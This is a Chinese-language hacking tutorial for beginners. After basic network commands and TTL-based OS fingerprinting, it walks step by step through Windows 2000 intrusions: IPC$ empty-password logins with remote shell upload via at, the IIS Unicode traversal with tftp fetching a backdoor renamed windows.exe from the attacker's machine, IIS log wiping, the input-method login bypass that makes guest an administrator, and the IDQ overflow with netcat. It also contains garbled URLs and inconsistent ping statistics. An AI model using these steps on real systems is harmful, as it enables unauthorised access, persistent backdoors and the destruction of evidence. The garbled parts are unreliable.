初涉网络

admin管理员组

文章数量:1640450

 初涉网络

在当今世界上，电脑信息网络使人们得以在国内各地乃至全球范围内交换各种各样的信息，正所谓“足不出户能知天下事”。在目前全球性电脑信息网络中，最为成功和覆盖面最大、信息资源最丰富的当属 ；
开始之前先请各位统装98的改装NT以上系统，因为下面用到的一些命令和软件
在98下是行不通的。通常得到管理员权限才能说入侵控制了对方计算机，所以下面的入侵方法都能得到管理员权限。说句题外话，我用的是win2000，所以操作都是在这个系统通过的。

一，还是要说一点基础的东西
找软件 在这里 华军软件园 http://bj2.onlinedown/ 天空下载站
http://www.skycn 天天安全网 http://www.ttian 黑白下载
http://www.heibai
找代理 在这里 http://search.lycos/dir/Comp...e_Proxy_Server/
http://www8.big.or.jp/~000/CyberSyndrome/psr3.html
找师傅
论坛就是你的“老师”这里特别推荐几个，中国鹰派http://www.chinawill 网络技术论坛 http://www.s8s8
小榕软件实验室 http://wwwxeyes/ http://wwwxeyes/
找注册码 在这里 http://www.skycn/soft/4445.html
搜索资料 在这里 http://www.google http://cn.yahoo
漏洞资料 在这里 安全焦点 www.xfocus 中联绿盟
网吧破解 在这里 http://cy07.126 (特别推荐）
二、IP和操作系统问题
我们怎样哪个得到网站的IP呢？
我们要用到“Ping.exe”，也就是“Ping”命令。
以Windows 98为例：

点击“开始”——“程序”——“MS-DOS 方式”。

输入：ping www.163（不要加“http://”。）

范例：

D:\>ping www.163
Pinging wwwhack [61.129.64.150] with 32 bytes of data:

Reply from 61.129.64.150: bytes=32 time=630ms TTL=116
Reply from 61.129.64.150: bytes=32 time=630ms TTL=116
Reply from 61.129.64.150: bytes=32 time=120ms TTL=116

Ping statistics for 61.129.64.150:
Packets: Sent = 4, Received = 2, Lost = 0(0% loss),
Approximate round trip times in milli-seconds:
Minimum = 120ms, Maximum = 630ms, Average = 187ms

其中：61.129.64.150 就是 163 Web服务器的IP地址。
我们注意道后面由一个TTL这是什么呢？
TTL：生存时间
　指定数据报被路由器丢弃之前允许通过的网段数量。

　　TTL 是由发送主机设置的，以防止数据包不断在 IP
互联网络上永不终止地循环。转发 IP 数据包时，要求路由器至少将 TTL 减小 1。

　　使用PING时涉及到的 ICMP 报文类型 一个为ICMP请求回显（ICMP Echo
Request） 一个为ICMP回显应答（ICMP Echo Reply）

　　三、TTL 字段值可以帮助我们识别操作系统类型。

UNIX 及类 UNIX 操作系统 ICMP 回显应答的 TTL 字段值为 255

Compaq Tru64 5.0 ICMP 回显应答的 TTL 字段值为 64

微软 Windows NT/2K操作系统 ICMP 回显应答的 TTL 字段值为 128

微软 Windows 95 操作系统 ICMP 回显应答的 TTL 字段值为 32

当然，返回的TTL值是相同的

　　但有些情况下有所特殊

LINUX Kernel 2.2.x & 2.4.x ICMP 回显应答的 TTL 字段值为 64

FreeBSD 4.1, 4.0, 3.4;
Sun Solaris 2.5.1, 2.6, 2.7, 2.8;
OpenBSD 2.6, 2.7,
NetBSD
HP UX 10.20
ICMP 回显应答的 TTL 字段值为 255

Windows 95/98/98SE
Windows ME
ICMP 回显应答的 TTL 字段值为 32

Windows NT4 WRKS
Windows NT4 Server
Windows 2000
ICMP 回显应答的 TTL 字段值为 128

　　这样，我们就可以通过这种方法来辨别 操作系统
TTL

LINUX 64
WIN2K/NT 128
WINDOWS 系列 32
UNIX 系列 255

　　经过测试的操作系统如下:

LINUX Kernel 2.2.x, Kernel 2.4t1-6; FreeBSD 4.1,4.0,3.4; OpenBSD
2.7,2.6; NetBSD
1.4.2; Sun Solaris 2.5.1,2.6,2.7,2.8; HP-UX 10.20, 11.0; AIX 4.1, 3.2;
Compaq
Tru64 5.0; Irix 6.5.3,6.5.8; BSDI BSD/OS 4.0,3.1; Ultrix 4.2-4.5;
OpenVMS 7.1-2;
Windows 95/98/98SE/ME; Windows NT 4 Workstation SP3, SP4, SP6a; Windows
NT 4
Server SP4; Windows 2000 Professional, Server, Advanced Server.
不过我们一般使用TTL值是系统默认的，我们也可以使用修改注册表的办法改变他的值，下面我们就来做一个例子。
开始——运行——regedit
找到[HKEY-LOCAL-MACHINE\SYSTEN\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS]
修改DefaultTTL为你想要的值，就可以改变主机的TTL值了。
注意的是，需要重新启动电脑才可以改变！
　怎样得到个人电脑的IP地址？

个人电脑的IP地址和服务器的IP地址不同。

拨号上网用户的IP地址会变的，而服务器的IP地址是不会变的。

那么，怎样获得别人的IP地址呢？

告诉大家，最好的办法，就是厚着面皮问人家拿。不过这是没人会给你的。：）

当然，我们不是用这种方法取得IP地址。
最简单的办法是安装一个能显示对方IP地址的QQ了，当然还有其他的办法，比如让对方浏览自己的网站等等，我就不多说了。

那么怎么样才能知道自己的IP呢？

我们可以使用DOS命令，比如在98下使用WINIPCFG,在2000下声音IPCONFIG等等，需要注意是必须要在DOS下运行。当然也可以利用QQ，把自己加为好友，就可以看了，至于如何加自己为好友，可以参考其他的文件，在这里

我说一下，将自己的QQ前面加一个0，注意是数字0而不是字母O。
至于更详细的，呵呵 ，不说了！


三、关于命令的使用 ，简单说明：
windowsNT/2000下有丰富的cmd可供使用，其作用也是巨大的。完全值得去熟练掌握她它们。windows2000本身就提供了详细的命令帮助。在开始菜单--》帮助中可以搜索到“windows
2000
命令参考”。强烈建议各位新手花些时间仔细看一遍。装了比如IIS等软件，就会有新的命令（iisreset），在命令行方式下加/?或-h参数可以查看帮助，其他内置的命令当然也可以。
下面说几个最经常用的
（一）NET命令的基本用法
需要注意的是：
<1>在NT下可以用图形的方式，开始-》帮助-》索引-》输入NET
<2>在COMMAND下可以用字符方式，NET /?或NET或NET HELP得到一些方法
相应的方法的帮助NET COMMAND /HELP

或NET HELP COMMAND 或NET COMMAND /? 另对于错误 NET HELPMSG
MESSAGE#是4位数
<3> 所有net命令接受选项/yes和/no(可缩写为/y和/n)。[简单的说就是
预先给系统的 提问一个答案]
下面对NET命令的不同参数的基本用法做一些初步的介绍：
1)NET VIEW
作 用：显示域列表、计算机列表或指定计算机的共享资源列表。
命令格式：net view [\\computername | /domain[omainname]
参数介绍：
<1>键入不带参数的net view显示当前域的计算机列表。
<2>\\computername 指定要查看其共享资源的计算机。
<3>/domain[omainname]指定要查看其可用计算机的域
简单事例
<1>net view \\YFANG查看YFANG的共享资源列表。
<2>net view /domain:LOVE查看LOVE域中的机器列表。
(2)NET USER
作 用：添加或更改用户帐号或显示用户帐号信息。该命令也可以写为 net users
。
命令格式：net user [username [password | *] [options] [/domain]
参数介绍:
<1>键入不带参数的net user查看计算机上的用户帐号列表。
<2>username添加、删除、更改或查看用户帐号名。
<3>password为用户帐号分配或更改密码。
<4>*提示输入密码。
<5>/domain在计算机主域的主域控制器中执行操作。
简单事例：
<1>net user yfang查看用户YFANG的信息
<2> net user linyun 123456 /add
增加一个用户名为linyun密码为123456的用户
(3)NET USE
作用：连接计算机或断开计算机与共享资源的连接，或显示计算机的连接信息。

命令格式：net use [devicename | *] [\\computername\sharename[\volume]
[password | *] [/userdomainname\]username] [/delete] |
[/persistent:{yes | no]}
参数介绍：
键入不带参数的net use列出网络连接。
devicename指定要连接到的资源名称或要断开的设备名称。
\\computername\sharename服务器及共享资源的名称。
password访问共享资源的密码。
*提示键入密码。 /user指定进行连接的另外一个用户。
domainname指定另一个域。
username指定登录的用户名。
/home将用户连接到其宿主目录
/delete取消指定网络连接。
/persistent控制永久网络连接的使用。
简单事例：
<1>net use e: \\YFANG\TEMP将\\YFANG\TEMP目录建立为E盘
<2>net use e: \\YFANG\TEMP /delete断开连接
4)NET TIME
作 用：使计算机的时钟与另一台计算机或域的时间同步。
命令格式：net time [\\computername | /domain[:name] [/set]
参数介绍：
<1>\\computername要检查或同步的服务器名。
<2>/domain[:name]指定要与其时间同步的域。
<3>/set使本计算机时钟与指定计算机或域的时钟同步。
简单事例：
<1> net time \\202.193.80.1查看IP为202.193.80.1的主机的时间
(5)Net Start
作 用：启动服务，或显示已启动服务的列表。
命令格式：net start service
简单事例：
<1> net start telnet 开启telnet服务
(8)NET STOP
作 用：停止 Windows NT 网络服务。
命令格式：net stop service
简单事例：
<1> net stop telnet 关闭telnet服务
(10)Net Share
作 用：创建、删除或显示共享资源。
命令格式：net share sharename=driveath [/users:number | /unlimited]
[/remark:"text"]
参数介绍：
<1>键入不带参数的net share显示本地计算机上所有共享资源的信息。
<2>sharename是共享资源的网络名称。
<3>driveath指定共享目录的绝对路径。
<4>/users:number设置可同时访问共享资源的最大用户数。
<5>/unlimited不限制同时访问共享资源的用户数。
<6>/remark:"text "添加关于资源的注释，注释文字用引号引住。
简单事例：
<1>net share mylove=c:\temp /remark:"my first
share"以mylove为共享名共享 C:\temp
<2>net share mylove /delete停止共享mylove目录
(15)Net Localgroup
作 用：添加、显示或更改本地组。一般与前面的net
user一起连用，创建一个用户平将其设为管理员
命令格式：net localgroup groupname {/add [/comment:"text "] | /delete}
[/domain]
参数介绍：
<1>键入不带参数的net localgroup显示服务器名称和计算机的本地组名称。
<2>groupname要添加、扩充或删除的本地组名称。
<3>/comment: "text "为新建或现有组添加注释。
<4>/domain在当前域的主域控制器中执行操作，否则仅在本地计算机上执行操作
?
<5>name [
...]列出要添加到本地组或从本地组中删除的一个或多个用户名或组名
。
<6>/add将全局组名或用户名添加到本地组中。
<7>/delete从本地组中删除组名或用户名。
简单事例：
<1>net localgroup love /add将名为love的本地组添加到本地用户帐号数据库
<2>net localgroup love显示love本地组中的用户
<3>net localgroup administrators linyun /add将linyun设为本机的管理员


（二）FTP命令及其应用
ftp的命令行格式为:ftp －v －d －i －n －g[主机名]
我们不说其他的，只说最简单的，如果我们想FTP一台IP为127.0.0.1主机，我们只是需要在DOS输入FTP
127.0.0.1就可以了，当然我们也可以使用上面的参数进行登录。还是解析一下吧
－v 显示远程服务器的所有响应信息。
　　－d 使用调试方式。
　　－n 限制ftp的自动登录,即不使用rc文件。
　　－g 取消全局文件名。

　ftp使用的内部命令如下(其中括号表示可选项):
1.ascii 使用ascii类型传输方式。
2.bin使用二进制文件传输方式。
　 3.bye退出ftp会话过程。
　4.close中断与远程服务器的ftp会话(与open对应)。
　5.dir[remote－dir][local－file]显示远程主机目录,并将结果存入local－file。
　6.get
remote－file[local－file]将远程主机的文件remote－file传至本地硬盘的local－file。
　7.put local－file将文件传输至远程主机。
　8.mkdir dir－name 在远程主机中建一目录。
9.open host[port]建立指定ftp服务器连接,可指定连接端口。
其实最主要的就是GET和PUT，也就是上传下载命令了，如果你不想要这样的麻烦，建议你有一个FTP工具，比如CUTEFTP，FLASHFXP什么的，很是简单直观的。
　

四、关于ipc$、空连接和默认共享
简单说明：
首先需要指出的是空连接和ipc$是不同的概念。空连接是在没有信任的情况下与服务器建立的会话，换句话说，它是一个到服务器的匿名访问。ipc$是为了让进程间通信而开放的命名管道，可以通过验证用户名和密码获得相应的权限。有许多的工具必须用到ipc$。默认共享是为了方便远程管理而开放的共享，包含了所有的逻辑盘（c$,d$,e$……）和系统目录winnt或windows（admin$）。
下面我们详解IPC$入侵方法
一、什么是IPC$漏洞

IPC$是共享“命名管道”的资源，它对于程序间的通讯很重要。在远程管理计算机和查看计算机的共享资源
时使用。利用IPC$我们可以与目标主机建立一个空的连接（无需用户名与密码），而利用这个空的连接，我们就可以得到目标主机上的用户列表。用“流光”的IPC$探测功能，就可以得到用户列表了，并可以配合字
典，进行密码尝试。
大家打开WIN2000自带的命令提示行，注意：这里我们不是教大家怎么破坏，只是给大家介绍这个漏洞的危害，
所以下面的IP是假设的,并不存在。

C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators"
//这是我用流光扫到的密码~~~我们就拿它开 ，

关于流光的使用可以看其本身的说明文件，已经很清楚的了！
上面的意思是与127.0.0.1建立一个连接，因为我们使用流光已经扫到用户名administrators，密码
为[空]，所以第一个双引号那里不用输入什么，后面一个双引号里的是用户名，我们输入administrators//
命令成功完成。
　

首先大家先把需要用到的工具COPY的你自己的C盘下，就是在流光TOOLS中。
C:\>copy srv.exe \\127.0.0.1\admin$
//先复制srv.exe上去，在流光的Tools目录就有。（这里的ADMIN$是指ADMIN用户的c:\winnt\system32\
大家还可以使用c$,d$这个的意思是C盘与D盘，这看你要复制到什么地方去了）
已复制 1 个文件。（成功了！*.*)

C:\>net time \\127.0.0.1
//查查时间。(这里的时间是指对方计算机的，也就是我们要入侵的127.0.0.1的时间，还有要提醒大家要注意的一点是，请把时间转换为24小时制，因为不少朋友问过我为什么启动不了服务，其实就是因为时间的问题）//
\\127.0.0.1 的当前时间是 2002/3/19 上午 11:00

命令成功完成。

C:\>at \\127.0.0.1 11:05 srv.exe
//用at命令启动srv.exe吧~！（这里设置的时间要比主机时间快，不然你怎么启动啊，呵呵！）//
新加了一项作业，其作业 ID = 1

C:\>net time \\127.0.0.1 //再查查够时间没有？！哈！ 时间到，LET\\\\\\\\\\\\\\\\\\\\\\''S GO
FOLLOW ME !//
\\127.0.0.1 的当前时间是 2002/3/19 上午 11:05

命令成功完成。

C:\>telnet 127.0.0.1 99
//我们telnet吧，注意端口是99哦,TELNET默认的是23端口，但是我们使用的是SRV在对方计算机中为我们建立一个99端口的SHELL。//
//哈哈！进来了耶！ 再给他加上一个ntlm
C:\>copy ntlm.exe \\127.0.0.1\admin$
//我们再开一个DOS窗口，把ntlm.exe上传到主机上。（也是在流光的Tools目录）
已复制 1 个文件。

C:\WINNT\system32>ntlm
//我们输入ntlm启动吧。（这里的C:\WINNT\system32>指的是对方计算机，我们运行ntlm其实是让这个程序在对方计算机上运行）//
ntlm
Windows 2000 Telnet Dump, by Assassin, All Rights Reserved.

Done! //OK了

C:\WINNT\system32>
C:\WINNT\system32>net start telnet //然后直接用net start
telnet启动telnet
Telnet 服务器正在启动.
Telnet 服务器已经启动成功。 //哈哈，我们成功了，该上去了。

第三步：我们使用TELNET到对方计算机上去
TELNET 127.0.0.1
接着输入用户名与密码就进入了

(我们已经进来了，使用方法和DOS命令是一样的）

这就是中国黑客入侵美国计算机的方法，在这之前是不是让你觉得很神秘呢？其实很简单的。不要认为这就是黑客的方法，这只能说是骇客。最后希望大家不要那这种方法来实践国内主机，否则我就成罪人了。

三、如何防范IPC$漏洞
　
看来上面的方法是不是觉得该检测一下自己是否有这个漏洞，还不赶快把这个漏洞给补上？跟我来吧，下面我们将教你如何防范IPC$的入侵
解决方法：
1、禁止建立空连接
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]
RestrictAnonymous = DWORD:00000001
2、禁止管理共享
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]
AutoShareServer = DWORD:00000000
3.到http://www.heibai/download/show.php?id=2194下载 delshare.zip
4.如果您觉得麻烦的话这样也可以，net share ipc$ /delete
把这个放进你的启动栏里面去
5.如果上面的方法您不会的话，这个方法可以说是最简单的了。把您的密码设置复杂一下，一面被一些不怀好意的人使用工具给破出来。不过想提醒大家一点，在复杂的密码都有可能被破解
常见问题和回答：
1，怎样建立空连接，它有什么用？
答：使用命令 net use \\IP\ipc$ "" /user:""
就可以简单地和目标建立一个空连接（需要目标开放ipc$）。
对于NT，在默认安全设置下，借助空连接可以列举目标用户、共享，访问everyone权限的共享，访问小部分注册表等，没有什么利用价值。对2000作用就更小了。而且实现也不方便，需借助工具。如果你不理解“没用”的东西为什么还会存在，就看看“专业”的解释吧：
在NT/2000下的空连接
http://www.3389/bbs/dispbbs.asp...D=3424&page=1：
解剖WIN2K下的空会话 http://www.sandflee/txt/list.asp?id=117
2，为什么我连不上IPC$？
答：1，只有nt/2000/xp及以上系统才可以建立ipc$。如果你用的是98/me是没有该功能的。
2，确认你的命令没有打错。正确的命令是： net use \\目标IP\ipc$ "密码"
/user:"用户名"
注意别多了或少了空格。当用户名和密码中不包含空格时两边的双引号可以省略。空密码用""表示。
3，根据返回的错误号分析原因：
错误号5，拒绝访问 ： 很可能你使用的用户不是管理员权限的，先提升权限；
错误号51，Windows 无法找到网络路径 : 网络有问题；
错误号53，找不到网络路径 ：
ip地址错误；目标未开机；目标lanmanserver服务未启动；目标有防火墙（端口过滤）；
错误号67，找不到网络名 ：
你的lanmanworkstation服务未启动；目标删除了ipc$；
错误号1219，提供的凭据与已存在的凭据集冲突 ：
你已经和对方建立了一个ipc$，请删除再连。
错误号1326，未知的用户名或错误密码 ： 原因很明显了；
错误号1792，试图登录，但是网络登录服务没有启动 ：
目标NetLogon服务未启动。（连接域控会出现此情况）
错误号2242，此用户的密码已经过期 ：
目标有帐号策略，强制定期要求更改密码。
4，关于ipc$连不上的问题比较复杂，本论坛没有总结出一个统一的认识，我在肉鸡上实验有时会得出矛盾的结论，十分棘手。
而且知道了问题所在，如果没有用其他办法获得shell，很多问题依然不能解决。问题过于细致后就不适合在本文章里探讨了。
各位看着办吧，呵呵。
3，怎样打开目标的IPC$？
答：首先你需要获得一个不依赖于ipc$的shell，比如sql的cmd扩展、telnet、木马。当然，这shell必须是admin权限的。然后你可以使用shell执行命令
net share ipc$
来开放目标的ipc$。从上一问题可以知道，ipc$能否使用还有很多条件。请确认相关服务都已运行，没有就启动它（不知道怎么做的请看net命令的用法）
。还是不行的话（比如有防火墙，杀不了）建议放弃。
4，怎样映射和访问默认共享？
答：使用命令 net use z: \\目标IP\c$ "密码" /user:"用户名"
将对方的c盘映射为自己的z盘，其他盘类推。
如果已经和目标建立了ipc$，则可以直接用IP加盘符加$访问。比如 copy
muma.exe \\IP\d$\path\muma.exe
。或者再映射也可以，只是不用用户名和密码了：net use y: \\IP\d$ 。然后 copy muma.exe

y:\path\muma.exe 。当路径中包含空格时，须用""将路径全引住。
5，如何删除映射和ipc$连接？
答：用命令 net use \\IP\ipc$ /del 删除和一个目标的ipc$连接。
用命令 net use z: /del 删除映射的z盘，其他盘类推。
用命令 net use * /del 删除全部。会有提示要求按y确认。
6，连上ipc$然后我能做什么？
答：能使用管理员权限的帐号成功和目标连接ipc$，表示你可以和对方系统做深入“交流”了。你可以使用各种命令行方式的工具（比如pstools系列、Win2000SrvReskit、telnethack等）获得目标信息、管理目标的进程和服务等。如果目标开放了默认共享（没开你就帮他开），你就可以上传木马并运行。也可以用tftp、ftp的办法上传。像dwrcc、VNC、RemoteAdmin等工具（木马）还具有直接控屏的功能。如果是2000server，还可以考虑
开启终端服务方便控制。这里提到的工具的使用，请看自带的说明或相关教程。
五、 关于扫描出的漏洞
简单说明：
很多扫描器都有漏洞扫描功能。当你获得了一些主机的漏洞列表时，不要急着把它们帖在论坛上，期望别人来为你分析和告诉你利用的方法。你应该首先尝试自己完成这些。扫描出的漏洞并不是都有用的，一部分漏洞过时了，一部分是误报。
漏洞搜索：
绿盟的引擎 http://security.nsfocus/index.php?act=sec_bug
补天网的引擎 http://www.patching/otherweb/leak/leakindex.asp
小凤居的引擎 http://www.chinesehack/file/list.asp?type=2
首先我们说最常用的几个漏洞，可能每一个人都用了
（一），Unicode漏洞
关于Unicode漏洞 已经有很多的资料说明了，我就不说了，我只是说应用。
我们利用Uincode漏洞，进行“实战”。

本次范例需要的系统及程序情况如下：

操作系统：Windows98

对方操作系统：Windows 2000

程序（一）：X-SCAN扫描器 v2.3 也可以用其他的扫描器

程序（一）： WinShell

程序（三）：tftpd32 汉化版

程序（四）：CleanIISLog

本机IP：127.0.0.1

测试IP：127.0.0.11

新程序说明：

下X-SCAN扫描器 v2.3：安全焦点的作品。相信大家已经很熟悉的了，不说了。

WinShell v1.0：“孤独剑客”的作品。在主机上运行后可以得到一个shell。

tftpd32 汉化版：外国程序员“Ph.jounin”制作的一个tftp程序。简单易用。

CleanIISLog：“小榕”写的一个日志清除程序。

首先，我们应该扫描存在Unicode漏洞的主机。

打开X-SCAN扫描器 v2.3；
选择一个IP段，开始扫描。

过了一会儿……

扫到了一个主机 IP：127.0.0.11

得到主机后，首先检验一下：http://127.0.0.11/scripts/..%c0%af..../cmd.exe?/c+dir

通常我第一件事就是上传一个shell或者一个木马。这样就容易办事了：）

我这里利用WinShell。

WinShell 功能如下：
[简要说明]
WinShell是一个运行在Windows上的Telnet服务器小程序，它体积小小，却功能不凡！
功能简列如下：
1、支持Windows 9x/me/nt/2000/...
2、支持所有标准Telnet客户端软件。
3、多线程设计支持无限用户同时登录。
4、支持自定义监听端口，默认是5277 。
5、支持后台运行，就是运行后无影无踪。
6、不需要安装，只一个exe文件，绿色环保。
7、支持远程终止服务器程序。
[举例说明]
1、后台监听23端口
C:\>winshell 23
2、前台监听23端口
C:\>winshell 23@
3、从23端口登录winshell
C:\>telnet xxx.xxx.xxx.xxx 23
4、登录或远程终止winshell

按照3登录成功后会看到如下信息：
WinShell v1.0 - \\\\\\\\\\\\\\\\\\\\\\''!\\\\\\\\\\\\\\\\\\\\\\'' to quit, \\\\\\\\\\\\\\\\\\\\\\''enter\\\\\\\\\\\\\\\\\\\\\\'' to shell...
这时候按“!”键即可终止winshell，按“回车”键即进入远程命令行状态，如下：
Microsoft Windows 2000 [Version 5.00.2195]

(C) Copyright 1985-2000 Microsoft Corp.


C:\WinShell>
[特别说明]
该程序目前在win9x和me上只能支持一个用户登录，待后续版本改进！

程序目前都限制不能在中文Windows NT/2000上执行!
解压缩 winshell.zip 后，我们把 winshell.exe 放到 tftp 的同一目录下。
然后，我们在地址栏（浏览器）里输入：
http://127.0.0.11/scripts/..%c0%af....cmd.exe?/c+tftp -i y.y.y.y GET
winshell.exe

c:\\inetpub\\scripts\\windows.exe
* 注意： y.y.y.y 为你的IP。（当你打开 tftpd32.exe
的时候，它会自动显示你的 IP）
“c:\\inetpub\\scripts\\”为入侵主机目录。（这里是“\\”，而不是“\”
“windows.exe”为上传后，winshell的文件名。（“windows”这个名字不容易被发现！）
然后，我们在地址栏（浏览器）里输入：
http://127.0.0.11/scripts/..%c0%af....pts\windows.exe
*
注意：这时候，通常浏览器迟迟都没有出结果。事实上，它已经启动了！请暂时不要关闭这个浏览器。
接着，我们就可以在 DOS 里：telnet 127.0.0.11 5277 （*
注意：5277为默认端口）
在这里给大家一个小技巧：
通常在 windows 2000 里“命令提示符”（cmd.exe）或 windows 98 的
telnet.exe 是不开回显的。
如果不打开回显，可能在 telnet 的时候，会看不到自己输入的命令。
打开方法如下：
Windows2000打开和关闭回显方法：
1、--进入Telnet状态，按CTRL+]，相当于ESC键
2、--输入set local_echo即可打开回显
3、--输入unset local_echo即可关闭回显
Win98下打开和关闭回显方法：
1、--打开Telnet窗口：在“开始”“运行”中输入“telnet”
2、--选取菜单栏的“终端”项，先择“首选”功能。
3、--出现一个“终端首选设置”，选取“终端选项”的“本地响应”即可打开。反之关闭。
当出现：
WinShell v1.0 - \\\\\\\\\\\\\\\\\\\\\\''!\\\\\\\\\\\\\\\\\\\\\\'' to quit, \\\\\\\\\\\\\\\\\\\\\\''enter\\\\\\\\\\\\\\\\\\\\\\'' to shell...
Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.

C:\Inetpub\scripts>

成功了！现在，就像在DOS环境下一样！
* 告诉你一个小技巧：
当你不知道主页文件放在主机的哪个位置的时候，我们可以在地址栏里输入一个不存在的
.ida 文件。它就会

显示出物理路径！
例如：http://127.0.0.11/cnhack.ida
接着，我们就可以看到：
The IDQ file C:\Inetpub\wwwroot\cnhack.ida could not be found.
其中，“C:\Inetpub\wwwroot\”就是那台主机存放主页的地方：）
当然，你也可以上传一个木马。这样来得更加方便！而且权限也比较高。
接着，我们使用CleanIISLog清除日志。
使用说明：
CleanIISLog是一个清除IIS LOG记录的工具，和其他工具相比有以下不同点：
1、可以清除指定的的IP连接记录，保留其他IP记录。
2、当清除成功后，CleanIISLog会在系统日志中将本身的运行记录清除。

用法: CleanIISLog |<.> |<.>

: 指定要处理的日志文件，如果指定为“.”，则处理所有的日志文件

（注意：处理所有日志文件需要很长的时间）。

:
指定要清除的IP记录，如果指定为“.”，则清除所有的IP记录（不推荐这样做）。

CleanIISLog只能在本地运行，而且必须具有Administrators权限。
也可以手动清除日志：

http://127.0.0.11/scripts/..%c0%af....32\logfiles\*.*

http://127.0.0.11/scripts/..%c0%af....em32\dtclog\*.*

http://127.0.0.11/scripts/..%c0%af....32\config\*.evt

http://127.0.0.11/scripts/..%c0%af....\system32\*.log

http://127.0.0.11/scripts/..%c0%af....\system32\*.txt

http://127.0.0.11/scripts/..%c0%af....+c:\winnt\*.log
（二）、Windows2000输入法漏洞
让我们来看看怎样利用此漏洞入侵。
本次范例需要的系统及程序情况如下：
操作系统：Windows98
对方操作系统：Windows 2000
程序（一）：终端服务客户端
程序（二）：superscan 3.0
本机IP：127.0.0.1
测试IP：127.0.0.14
新程序说明：
“终端服务客户端”是微软为管理员制作的一个远程管理软件。利用它可以远程管理服务器，操作如同在本地

一样。（连接端口：3389）
1、首先，我们打开superscan。
设置：
IP：（需要扫描的IP地址。）
Start：127.0.0.1
Stop：127.0.0.255
Scan Type：（扫描类型设置。）
All ports from：3389|3389

然后，点击“Start”，开始扫描。

2、点击“Prune”，把多余的主机删除。然后把剩下的主机的IP地址记下来。（假设，我们扫描到：

127.0.0.14。）

3、打开“终端服务客户端”，设置。

服务器：127.0.0.14

其他默认。

点击“连接”，完成。

4、过了一会，Windows2000的登陆界面就出来了。（如果发现是英文或繁体中文版，就放弃。）

5、用CTRL+SHIFT快速切换输入法，切换至全拼，这时在登录界面左下角将出现输入法状态条（如果没有出现，请耐心等待，因为对方的数据流传输还有一个过程）。

方法（一）：

1、在输入法状态条上按鼠标右键。选择“帮助” —— “输入法指南” ——
“选项”。（如果发现“帮助”呈灰色，放弃，因为对方很可能发现并已经补上了这个漏洞。）

2、按右键，选择“跳转到URL”，输入：c:\winnt\system32\cmd.exe

3、选择“保存到磁盘”。

4、选择目录：c:\inetpub\scripts\

5、打开IE，输入：http://127.0.0.14/scripts/cmd.exe?/c+dir+c:\

现在，我们制作了一个shell（cmd.exe）。（关于如何利用，请看“unicode漏洞”篇。）

方法（二）：

1、在输入法状态条上按鼠标右键。选择“帮助” —— “输入法指南” ——
“选项”。（如果发现“帮助”呈灰色，放弃，因为对方很可能发现并已经补上了这个漏洞）

2、按右键，选择“跳转到URL”，输入：c:\winnt\system32
（system32为系统目录，不同的主机，系统目录的位置也不同。）

3、在该目录下找到“net.exe”，为“net.exe”创建一个快捷方式。

4、右键点击该快捷方式，在“属性” —— “目标”——
c:\winnt\system32\net.exe 后面空一格，填入“

user guest /active :yes”。

5、点击“确定”。

说明：这一步骤目的是，利用“net.exe”激活被禁止使用的guest账户。

6、运行该快捷方式。（此时你不会看到运行状态，但guest用户已被激活。）

7、重复第4-6步。（其中，在“属性” —— “目标”——
c:\winnt\system32\net.exe 后面空一格，填入“user guest 密码”。）

说明：这一步骤目的是，利用“net.exe”激活guest账户的密码。

8、重复第4-6步。（其中，在“属性” —— “目标”——
c:\winnt\system32\net.exe 后面空一格，填入“localgroup administrators guest /add“）
说明：这一步骤目的是，利用“net.exe”将guest变成系统管理员。
9、再次登录终端服务器，以“guest”身份进入，此时guest已是系统管理员，已具备一切可执行权及一切操作权限。
现在，我们可以像操作本地主机一样，控制对方系统。
注意事项：
1、在这过程中，如果对方管理员正在使用终端服务管理器，他将看到你所打开的进程id及你的IP和主机名。
2、终端服务器在验证你的身份的时候只留给了你一分钟的时间。在这一分钟内如果你不能完成上述操作，你只能再连接。
3、你所看到的图像与操作会有所延迟，这受网速的影响。

（三）、idq.dll缓冲区溢出漏洞
本次范例需要的系统及程序情况如下：

操作系统：Windows98

对方操作系统：Windows 2000

程序（一）：Snake IIS IDQ 溢出程序 V2.0 Build0016 GUI版本

程序（二）：X-SCAN扫描器 v2.3

程序（二）：Netcat 1.10 for NT 版

本机IP：127.0.0.1

测试IP：127.0.0.15

新程序说明：

“Snake IIS IDQ
溢出程序”是著名程序“Snake代理跳板”的作者“snake”制作的。使用此程序能利用idq漏

洞溢出一个管理员（system）shell。

支持的操作系统 类型: ----

"IIS5 Chinese Win2k",
"IIS5 Chinese Win2k Sp1",
"IIS5 Chinese Win2k Sp2",
"IIS5 English Win2k",
"IIS5 English Win2k Sp1",
"IIS5 English Win2k Sp2",
"IIS5 Japanese Win2k",
"IIS5 Japanese Win2k Sp1",
"IIS5 Mexico Win2k",
"IIS5 Korea Win2k SP1",
"IIS5 Korea Win2k SP2",

附：源代码及注解

Netcat：简称“NC”，一个功能非常强大的程序。功能与telnet差不多，但比telnet强大。

说明：

[v1.10]
想要连接到某处: nc [-options] hostname port[s] [ports] ...
绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
参数:
-e prog 程序重定向，一旦连接，就执行 [危险!!]
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h 帮助信息
-i secs 延时的间隔
-l 监听模式，用于入站连接
-n 指定数字的IP地址，不能用hostname
-o file 记录16进制的传输
-p port 本地端口号
-r 任意指定本地及远程端口
-s addr 本地源地址
-u UDP模式
-v 详细输出——用两个-v可得到更详细的内容
-w secs timeout的时间
-z 将输入输出关掉——用于扫描时

其中端口号可以指定一个或者用lo-hi式的指定范围。

1、打开“X-SCAN扫描器 v2.3”：

“X-SCAN扫描器 v2.3”使用方法，大家可以看天天安全网上面的文章。


过一会……

得到一台主机：127.0.0.15（此主机为演示用的主机，并不存在。）

Snake IIS IDQ 溢出程序分为GUI（图形）版本和命令行版本。

我们使用的是GUI版本。

2、设置“Snake IIS IDQ 溢出程序”：

被攻击地址：

IP：127.0.0.15

Port：80

溢出选项：

选择“溢出后，在一个端口监听”

监听端口：813

要绑定的命令：cmd.exe /c dir c:\

操作系统类型：IIS5 Chinese Win2k

说明：IIS5 Chinese Win2k

IIS5：IIS的版本。

Chinese：操作系统为中文

Win2k：操作系统为Windows2000

3、点击“IDQ溢出”，完成。

